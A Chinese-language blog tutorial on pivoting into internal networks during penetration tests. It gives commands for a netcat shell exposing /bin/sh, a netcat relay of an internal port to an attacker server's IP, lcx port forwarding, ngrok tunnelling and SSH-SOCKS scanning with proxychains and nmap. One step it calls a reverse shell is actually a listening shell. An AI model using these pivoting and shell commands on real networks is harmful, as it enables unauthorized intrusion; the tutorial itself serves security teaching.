内网安全:03.对内网主机的端口进行探测(长期更新)

释放双眼,带上耳机,听听看~!

目录:lcx端口反向转发、搭建ngrok内网穿透转发端口、proxychains扫描内网主机

叙述:

有时候我们常常会在渗透的时候,碰到一个内网环境。有一些端口是只有内部才能够访问到的,那么,我们为了访问到这个端口,就需要对端口进行转发。。。

当然,这有一个前提:内网的主机能够与外网相连接——-&*bugfor首发:菊花槿*&

当然,如果碰到内网主机无法访问外网的情况,咱们就使用“proxychains扫描内网主机”,稍后也会描述这个方法

0x0  环境

内网:180.101.148.103

内网主机A(web服务器):172.19.0.3   他把80端口通过路由映射到外网

内网主机B(linux):172.19.0.2  他把端口22通过路由映射到外网

内网主机C(linux):172.19.0.1

攻击机服务器:49.233.160.31

0x1  netcat、lcx端口反向转发

需要用到的东西:netcat工具、lcx工具、一台远程服务器

前提:内网的主机能够与外网相连接

·linux主机映射shell窗口到攻击机服务器(使用netcat)

远程服务器开启一个nc:

nc.exe -n -vv -l -p 8888     #开启nc监听8888端口

内网主机反弹shell到 远程服务器的8888端口:

nc -l -p 8888 -t -e /bin/sh

·linux主机映射内网端口窗口到攻击机服务器(使用netcat+lcx)

远程服务器开启一个lcx:

lcx.exe -listen 8888 8989     #监听8888端口,然后开启8989端口

内网主机8009端口到 远程服务器的8888端口:

netcat -l 8009 0<backpipe | nc 49.233.160.31 8888 1>backpipe   #将内网的8009端口 反弹到 远程服务器的8888端口

说明:这个时候你就可以在你的攻击机访问/扫描127.0.0.1:8989了,扫描即是扫描内网的8009

·windows方法

同上,你只需要上传nc、lcx即可,唯一不同的是上传的文件不一样。。。

——-&*bugfor首发:菊花槿*&

0x2 ngrok内网穿透转发端口

需要用到的东西:ngrok、一台远程服务器、可正常使用的域名(port.ngrok.xyz)

前提:内网的主机能够与外网相连接

·使用ngrok映射内网端口到域名

上传ngrok,然后执行以下命令:

./ngrok -subdomain demo -config ./ngrok.cfg -proto=tcp 1231     #将本地的1231端口映射到域名

你也可以通过修改配置文件来执行,映射端口1231:

server_addr: "port.ngrok.xyz:4443"
trust_host_root_certs: false

tunnels:
    demo:
        remote_port: 50000
        proto:
            tcp: 1231

然后执行命令即可:

./ngrok -config ./ngrok.cfg start demo    ##将本地的1231端口映射到域名port.ngrok.xyz:50000

你访问域名port.ngrok.xyz:50000  即是访问内网的1231端口了

0x3  proxychains扫描内网主机

前提:内网的主机无法与外网相连接,仅能通过内网主机访问;一台可控的内网linux主机

需要用到的东西:

①拿到权限的内网主机B(linux)–172.19.0.2  

②目标:内网主机C(linux)–172.19.0.1  

·使用kali扫描目标服务器

sudo apt install proxychains    #安装

vi  /etc/ssh/sshd_config   #修改配置文件,如下

AllowTcpForwarding yes 
GatewayPorts yes

sudo apt install lrzsz

ssh -i  AD-Learning.pem [email protected] -D 8888    #连接内网主机B(端口22映射了的),然后kali在本地开启一个8888端口监听

vi /etc/proxychains.conf    #修改配置文件,如下:

socks5 127.0.0.1 8888

好了,到了这一步就配置完成了,这样你就可以扫描内网主机C了:

proxychains nmap -p88 172.19.0.1 -n

安全独秀圈

Covenant是面向红色团队的协作.NET C2框架

2020-4-21 13:32:21

安全独秀圈

正反shell学习与实战

2020-4-21 20:42:29

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索